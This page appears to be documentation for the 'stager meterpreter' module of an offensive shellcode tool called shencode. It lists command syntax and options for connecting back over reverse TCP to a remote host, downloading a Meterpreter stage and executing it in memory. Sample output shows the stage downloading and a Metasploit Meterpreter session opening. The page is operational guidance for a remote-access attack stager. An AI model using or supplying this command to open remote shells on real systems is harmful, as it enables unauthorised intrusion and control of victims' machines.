Meterpreter Stager
Description
stager/meterpreteris now available for unix systems, but be careful! Injection won’t work. Use relay_buffer to redirect the output.
Connect back to a meterpreter stage, which were initiated with reverse_tcp
Command
shencode stager meterpreter [-h] -p REMOTE_PORT -r REMOTE_HOST [-a {x64,x86}] -s SLEEPTIME [-t TIMEOUT]
Connect back (reverse_tcp) to remote host and receive a stage
options:
-h, --help show this help message and exit
-p, --remote-port Remote port to connect to
-r, --remote-host Remote host to connect to
additional:
-a, --architecture Architecture to use, x64 is the default (x86/x64)
-s, --sleeptime Sleep for x seconds before the stage is executed
-t, --timeout Connect timeout in seconds, 30 seconds is the defaultExample output
Shencode
[*] Creating Socket...
[+] Connection established
[*] Download stage...
[*] Payload size: 203846 bytes
[+] Stage downloaded!
[*] Trying to execute Meterpreter stage...
[+] Memory allocated!Metasploit
[*] Started reverse TCP handler on 0.0.0.0:9911
[*] Sending stage (203846 bytes) to 172.17.240.1
[*] Meterpreter session 5 opened (172.17.253.140:9911 -> 172.17.240.1:37692) at 2025-01-27 00:52:05 +0100
meterpreter > JSON Parameter
| Arguments | Values | Type |
|---|---|---|
| remote_host | ip or hostname | str |
| remote_port | port | int |
| timeout | seconds | int |
| architecture | x86, x64 | str |
| sleeptime | seconds | int |